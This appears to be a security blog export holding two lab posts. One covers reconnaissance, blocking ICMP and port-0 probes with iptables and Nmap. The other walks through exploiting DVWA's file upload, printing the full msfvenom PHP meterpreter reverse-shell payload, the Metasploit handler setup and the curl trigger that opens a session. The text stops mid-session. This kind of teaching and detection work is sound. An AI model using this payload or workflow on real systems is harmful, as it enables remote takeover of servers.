<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110 > </span><b><span style="color: #fcff01;">10.0.0.100: ICMP address mask request</span></b><span style="color: white;">, length 12</span></span>
<span><span style="color: white;">IP 10.0.0.110 > </span><b><span style="color: #fcff01;">10.0.0.100: ICMP address mask request</span></b><span style="color: white;">, length 12</span></span>
</pre></div>
<p></p><p>Well the host sees the request but there is no response. Why is this so? Well fortunately, in this case, there is nothing for us to do as this method seems to have been deprecated based on <a href="https://www.rfc-editor.org/rfc/rfc6918#section-2.4" target="_blank">RFC 6918</a> sections 2.4 and 2.5. </p><p>However, a threat actor can try other mechanisms, such as specifically crafting a packet using <a href="https://www.securitynik.com/2014/05/building-your-own-tcp-3-way-handshake.html" target="_blank">scapy</a>. Do keep in mind, there are a lot of these ICMP types and codes that have been deprecated, but depending on the system being targeted (older system?, IoT device?) some of these techniques may still succeed.</p><p>Now just to be clear, I only went through blocking those individual types for learning experience. The reality is, we could have done one line to block all ICMP, such as below.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter --append INPUT </span><span style="color: #fcff01;"><b>--proto icmp</b></span><span><span style="color: white;"> --in-interface ens33 --jump </span><b><span style="color: #fcff01;">DROP</span></b></span>
<span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list INPUT --numeric --verbose</span>
<span style="color: white;">Chain INPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span><span style="color: white;"> 0 0 </span><b><span style="color: #fcff01;">DROP icmp </span></b><span style="color: white;">-- ens33 * 0.0.0.0/0 0.0.0.0/0</span></span>
</pre></div>
<p></p><p>If we run the commands above again all should be blocked. You should then see something such as below in your firewall table.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list INPUT --numeric --verbose</span>
<span style="color: white;">Chain INPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">6 200 DROP icmp</span></b><span style="color: white;"> -- ens33 * 0.0.0.0/0 0.0.0.0/0</span></span>
</pre></div>
<p></p><p>Ok. Now we have completed the initial part of understanding why we need to get to port 0.</p><p>Here we go! The firewall is blocking all ICMP traffic. However, we are still interested in simply knowing if the host is up. Let's figure that out.</p><p>First things first, there should never be any service running on port 0. For example, if we run netstat or in my case below <i>ss</i>, we see on this host:</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo ss --numeric --listening --tcp</span>
<span style="color: white;">State Recv-Q Send-Q Local Address:Port Peer Address:Port Process</span>
<span style="color: white;">LISTEN 0 4096 0.0.0.0:27017 0.0.0.0:*</span>
<span style="color: white;">LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*</span>
<span style="color: white;">LISTEN 0 128 0.0.0.0:22 0.0.0.0:*</span>
<span style="color: white;">LISTEN 0 244 0.0.0.0:5432 0.0.0.0:*</span>
<span style="color: white;">LISTEN 0 128 [::]:22 [::]:*</span>
<span style="color: white;">LISTEN 0 244 [::]:5432 [::]:*</span>
</pre></div>
<p></p><p>There is no port 0. So once again, why would an attacker port 0? Let's run Nmap to figure it out.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo nmap --send-ip -n 10.0.0.100 -Pn </span><b><span style="color: #fcff01;">-p 0 --reason</span></b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 23:27 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.100</span>
<span style="color: white;">Host is up, received user-set (0.00052s latency).</span>
<span><span style="color: white;">PORT STATE SERVICE </span><b><span style="color: #fcff01;">REASON</span></b></span>
<span><span style="color: white;">0/tcp closed unknown </span><b><span style="color: #fcff01;">reset </span></b><span style="color: white;">ttl 64</span></span>
<span style="color: white;">MAC Address: 00:0C:29:A2:BB:D7 (VMware)</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">1 host up</span></b><span style="color: white;">) scanned in 0.20 seconds</span></span>
</pre></div>
<p></p><p>We see above Nmap is reporting 1 host up. We also see the reason it knows the host is up, is because it got a "<i>reset</i>". We can confirm at the target host that it did send a <i>reset </i>message.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and port 0'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110.61475 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 1785192689, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.100.0 > 10.0.0.110.61475: </span><b><span style="color: #fcff01;">Flags [R.]</span></b><span style="color: white;">, seq 0, ack 1785192690, win 0, length 0</span></span>
</pre></div>
<p></p><p>So what was the objective above? Even though we block the ICMP messages, from a reconnaissance perspective, the threat actor could target port 0, just to illicit this <i>[R.]</i> message. This confirms the host is online and hence the threat actor would have achieved the same objective as if he or she had pinged the host and got a response.</p><p>Let's close this off by blocking traffic coming in to port 0.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter --append INPUT </span><b><span style="color: #fcff01;">--proto tcp --dport 0</span></b><span style="color: white;"> --in-interface ens33 --jump </span><b><span style="color: #fcff01;">DROP</span></b></span></pre></div><p>Run the scan again</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo nmap --send-ip -n 10.0.0.100 -Pn -p 0 --reason</span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 23:32 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.100</span>
<b><span style="color: #fcff01;"><span>Host is up, received user-set.</span>
</span></b>
<span><span style="color: white;">PORT STATE SERVICE </span><b><span style="color: #fcff01;">REASON</span></b></span>
<span><span style="color: white;">0/tcp filtered unknown</span><b><span style="color: #fcff01;"> no-response</span></b></span>
<span style="color: white;">Nmap done: 1 IP address (</span><span style="color: #fcff01;"><b>1 host up</b></span><span style="color: white;">) scanned in 2.10 seconds</span>
</pre></div>
<p></p><p>Now I find it strange above, that the <i>REASON </i>given is <i>no-response</i> but yet still Nmap is reporting 1 host is up. I take it this has to do with ARP. See the reference section for a discussion on this scenario. However, if you have a clearer answer, let me know.</p><p>If we look at the host, we can see the SYNs came in but no [R.] was sent.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and port 0'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span style="color: white;">IP 10.0.0.110.46295 > 10.0.0.100.0: </span><span style="color: #fcff01;"><b>Flags [S]</b></span><span style="color: white;">, seq 11534259, win 1024, options [mss 1460], length 0</span>
<span><span style="color: white;">IP 10.0.0.110.46297 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 11403185, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.39645 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 465318364, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.39647 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 465449438, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.65137 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 899162038, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.65139 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 899293108, win 1024, options [mss 1460], length 0</span></span>
</pre></div>
<p></p><p>We also see the firewall is dropping the Port 0 packets as while the SYN came in, there is no RST ACK.</p><p>I decided to try another trick, just in case for some strange reason the RST was being generated and I was not seeing it. This time, I configured the firewall to prevent the RST from leaving the device. </p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter </span><b style="color: white;">--append OUTPUT</b><span style="color: white;"> </span><b><span style="color: #fcff01;">--proto tcp --dport 0 --tcp-flags RST RST</span></b><span style="color: white;"> --out-interface ens33 --jump </span><b><span style="color: #fcff01;">DROP</span></b></span>
</pre></div>
<p></p><p>When I rerun the attack, targeting port 0, the output is basically the same. No RST. Which is what I expected because I blocked the port earlier.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and port 0'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110.64965 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 1541258948, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.64967 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 1541390022, win 1024, options [mss 1460], length 0</span></span>
</pre></div>
<p></p><p>Peaking into the firewall to see if any RST was generated and prevented from leaving, we see:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list OUTPUT --numeric --verbose</span>
<span style="color: white;">Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> 0 0 DROP </span></b><span style="color: white;"> tcp -- * ens33 0.0.0.0/0 0.0.0.0/0 tcp dpt:0 flags:0x04/0x04</span></span>
</pre></div>
<p></p><p>Basically, the RST was not even generated and thus no opportunity to even be dropped.</p><p>Ok. I think we address the learnings for this example. No need to do anything else with this. </p><p>Main takeaway? Other than pings, threat actors can identify whether a host is live or not by using some seemingly simple reconnaissance techniques. We covered a few in this post. However, there are many more you can try on your own.</p><p><br />References:<br /><a href="https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol">Internet Control Message Protocol - Wikipedia</a><br /><a href="https://www.rfc-editor.org/rfc/rfc6918#section-2.4">RFC 6918: Formally Deprecating Some ICMPv4 Message Types (rfc-editor.org)</a><br /><a href="https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml">Internet Control Message Protocol (ICMP) Parameters (iana.org)</a><br /><a href="https://security.stackexchange.com/questions/183381/why-i-recived-user-set-on-my-nmap-analyze">Why I recived user-set on my Nmap analyze? - Information Security Stack Exchange</a><br /><a href="https://www.securitynik.com/2015/08/stimulus-and-response-revisited.html">Learning by practicing: Stimulus and response revisited (securitynik.com)</a><br /><a href="https://attack.mitre.org/">MITRE ATT&CK®</a><br /><a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html">Cyber Kill Chain® | Lockheed Martin</a><br /><a href="https://www.securitynik.com/2017/03/the-importance-of-reconnaissance-to.html">Learning by practicing: The importance of reconnaissance to the targeted threat actor (securitynik.com)</a><br /><a href="https://linux.die.net/man/1/nmap">nmap(1) - Linux man page (die.net)</a><br /><a href="https://www.securitynik.com/2014/05/building-your-own-tcp-3-way-handshake.html">Learning by practicing: Building your own TCP 3-way handshake – Packet Crafting – The Scapy Way (securitynik.com)</a></p>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-89821285522684589362023-12-12T18:31:00.000-08:002023-12-12T18:43:20.424-08:00Beginning Nikto - File Upload Vulnerability testing<p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata. </p><p><br /><b><span style="font-size: medium;">The Hack - Beginning Nikto - File Upload Vulnerability testing</span></b></p><p>Trying a different scan by providing the entire URL</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_0]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106/dvwa/vulnerabilities/upload/ -ipv4 -Display 1 --ask no - -nossl -no404 -Tuning 0 </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Nothing much changed from what you saw in the earlier posts. Manually performing the exploit.<br /><br />In this case, I'm transitioning to the manual exploitation of the file Upload vulnerability.</p><p>Visit the file upload page within DVWA.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKZD0xVbUVXQ5Y6PpUBWwYemSfOAY5wvkqw92nfBRFRchbT5a_GD7RFVEMCUVg9uq61ufbNAfkvRkiI92HqH-Za176Wh3x9puSuzpMYpuUZr1cxG_OoKTjFzlrZPdu2QXKcxwPSnCYl3QbKgU1FxMs-sI6PArJntJP26CqhT5EB9Trz6qcoq7zD7hytQ/s891/File-upload-home-page.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="447" data-original-width="891" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKZD0xVbUVXQ5Y6PpUBWwYemSfOAY5wvkqw92nfBRFRchbT5a_GD7RFVEMCUVg9uq61ufbNAfkvRkiI92HqH-Za176Wh3x9puSuzpMYpuUZr1cxG_OoKTjFzlrZPdu2QXKcxwPSnCYl3QbKgU1FxMs-sI6PArJntJP26CqhT5EB9Trz6qcoq7zD7hytQ/w400-h201/File-upload-home-page.png" width="400" /></a></div><br /><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><p><br /><br /><br /><br />Open the browser "<i>Web Developer Tools</i>" and select the "<i>Network</i>" tab. </p><p>Upload the file via the web application and we see the file successfully uploaded.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLBV3tRcuo40GdhSRvEa8mRPz4W3Qpn-j--gDwyMLrN47zqjc4zw9ZnhxPL-bmycPoKmWqjIPaeRS3sjZICTvHzppbnpNUnbxilkG9ZHMrbHC2NVJRQ0Q2V-ntA8ujtAk4uDlun9U8lNwpYZ0B3nMXc4TrEGw2tSiGsWgrg1oE18UVrv_s8dYnQ5hm6MQ/s564/generic_file_successfully_uploaded.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="564" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLBV3tRcuo40GdhSRvEa8mRPz4W3Qpn-j--gDwyMLrN47zqjc4zw9ZnhxPL-bmycPoKmWqjIPaeRS3sjZICTvHzppbnpNUnbxilkG9ZHMrbHC2NVJRQ0Q2V-ntA8ujtAk4uDlun9U8lNwpYZ0B3nMXc4TrEGw2tSiGsWgrg1oE18UVrv_s8dYnQ5hm6MQ/w400-h139/generic_file_successfully_uploaded.png" width="400" /></a></div><br /><p><br /></p><p><br /><br /><br /><br /><br /></p><p>The upload also confirms the location the file was uploaded to "<i>./../hackable/uploads/hack_and_detect.png succesfully uploaded!"</i>. This looks like two directories down from the current directory.</p><p>Revisiting the "<i>Web Developer Tools</i>", extracting a few lines of interest. First from the request:</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Headers tab:</span>
<span style="color: white;"> ** </span>
<span style="color: white;"> scheme: http</span>
<span style="color: white;"> host: 10.0.0.106</span>
<span style="color: white;"> filename: /dvwa/vulnerabilities/upload/</span>
<span style="color: white;">Request tab:</span>
<span style="color: white;"> -----------------------------12554550258851086011705289877</span>
<span style="color: white;"> Content-Disposition: form-data; name="MAX_FILE_SIZE"</span>
<span style="color: white;"> 100000</span>
<span style="color: white;"> -----------------------------12554550258851086011705289877</span>
<span><span style="color: white;"> Content-Disposition: form-data; name="uploaded"; </span><b><span style="color: #fcff01;">filename="hack_and_detect.png</span></b><span style="color: white;">"</span></span>
<span style="color: white;"> Content-Type: image/png</span>
<span style="color: white;"> PNG</span>
<span style="color: white;"> </span>
<span style="color: white;"> ...</span>
<span style="color: white;"> 0çJ3ÄÉæ} 6ý×</span>
<span style="color: white;"> ...</span>
<span style="color: white;"> -----------------------------12554550258851086011705289877</span>
<span style="color: white;"> Content-Disposition: form-data; name="Upload"</span>
<span style="color: white;"> Upload</span>
<span style="color: white;"> -----------------------------12554550258851086011705289877--</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>Looking at "Response" tab:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">../../hackable/uploads/hack_and_detect.png succesfully uploaded!</span>
</pre></div>
</div><div><br />With this in place, can we use curl to get this file?<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ curl --request GET "http://10.0.0.106/dvwa/hackable/uploads/hack_and_detect.png" --output /tmp/hack_and_detect.png</span>
<span style="color: white;"> % Total % Received % Xferd Average Speed Time Time Time Current</span>
<span style="color: white;"> Dload Upload Total Spent Left Speed</span>
<span style="color: white;">100 64493 100 64493 0 0 7641k 0 --:--:-- --:--:-- --:--:-- 7872k</span>
</pre></div>
</div><div><br /></div><div><div>Verify the file was downloaded and its size:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/file_upload]</span>
<span style="color: white;">└─$ ls /tmp/hack_and_detect.png -l</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 64493 Jun 22 15:25 /tmp/hack_and_detect.png</span>
</pre></div>
</div><div><br /></div><div>Open the file with "feh"</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwthZmFpWbRgdloAVvyKyekhfd-kbjUv00J0fcd_vskXnQQlYLn-kiw_bRktfA6J2wdsQYHd3cI4VUNe5FPo78HyicFvTBQ6guuuevLL4aotqBKGZE6SnSOl5KEB1GGwrl_LnmbAtJVrzDa2Zl-0ZWML9VPRpj0zj384epzXkahSJNgERkFeX85NiouDY/s262/feh-hack-detect.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="217" data-original-width="262" height="331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwthZmFpWbRgdloAVvyKyekhfd-kbjUv00J0fcd_vskXnQQlYLn-kiw_bRktfA6J2wdsQYHd3cI4VUNe5FPo78HyicFvTBQ6guuuevLL4aotqBKGZE6SnSOl5KEB1GGwrl_LnmbAtJVrzDa2Zl-0ZWML9VPRpj0zj384epzXkahSJNgERkFeX85NiouDY/w400-h331/feh-hack-detect.png" width="400" /></a></div><br /><div><br /><br /><br /><br /><br /><br /><br /></div><br /></div><p><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />With confirmation that the file is in place, this means we may be able to upload other files.</p><p>Leveraging <i>msfvenom</i> to create a malicious PHP file.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.108 LPORT=9999 --format raw --out malicious.php</span>
<span style="color: white;">[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload</span>
<span style="color: white;">[-] No arch selected, selecting arch: php from the payload</span>
<span style="color: white;">No encoder specified, outputting raw payload</span>
<span style="color: white;">Payload size: 1111 bytes</span>
<span style="color: white;">Saved as: malicious.php</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>View the created code</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ cat malicious.php </span>
<span style="color: white;">/*<?php /**/ error_reporting(0); $ip = '10.0.0.108'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();</span>
</pre></div>
<br /><div>Upload the malicious <i>.php </i>file, using the same process we did for the other files.</div><div><br /></div><div>Setup a resource file using the <i>multi-handler</i> to load with <i>msfconsole</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ cat dvwa.rc </span>
<span style="color: white;">#File Upload Vulnerability</span>
<span style="color: white;">use exploit/multi/handler</span>
<span style="color: white;">set PAYLOAD php/meterpreter/reverse_tcp</span>
<span style="color: white;">set LHOST 10.0.0.108</span>
<span style="color: white;">set LPORT 9999</span>
<span style="color: white;">exploit</span>
</pre></div><br /></div><div>Load up the resource file with <i>msfconsole</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ msfconsole --quiet --resource dvwa.rc </span>
<span style="color: white;">[*] Processing dvwa.rc for ERB directives.</span>
<span style="color: white;">resource (dvwa.rc)> use exploit/multi/handler</span>
<span style="color: white;">[*] Using configured payload generic/shell_reverse_tcp</span>
<span style="color: white;">resource (dvwa.rc)> set PAYLOAD php/meterpreter/reverse_tcp</span>
<span style="color: white;">PAYLOAD => php/meterpreter/reverse_tcp</span>
<span style="color: white;">resource (dvwa.rc)> set LHOST 10.0.0.108</span>
<span style="color: white;">LHOST => 10.0.0.108</span>
<span style="color: white;">resource (dvwa.rc)> set LPORT 9999</span>
<span style="color: white;">LPORT => 9999</span>
<span style="color: white;">resource (dvwa.rc)> exploit</span>
<span style="color: white;">[*] Started reverse TCP handler on 10.0.0.108:9999 </span>
</pre></div>
</div><div><br /></div><div><div>Use <i>curl</i> to access the <i>malicious.php</i> file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ curl --request GET http://10.0.0.106/dvwa/hackable/uploads/malicious.php</span>
</pre></div>
</div><div><br /></div><div><div>At this point, curl hangs and the MSF handler opens a session.<br /><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">[*] Sending stage (39927 bytes) to 10.0.0.106</span>
<span style="color: white;">[*] Meterpreter session 1 opened (10.0.0.108:9999 -> 10.0.0.106:49786) at 2023-06-22 15:29:04 -0400</span>
</pre></div>
</div><div><br /></div>Validate we have successfully gained access to the system.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">meterpreter > sysinfo </span>
<span style="color: white;">Computer : NIK-WIN-10</span>
<span style="color: white;">OS : Windows NT NIK-WIN-10 10.0 build 19044 (Windows 10) AMD64</span>
<span style="color: white;">Meterpreter : php/windows</span>
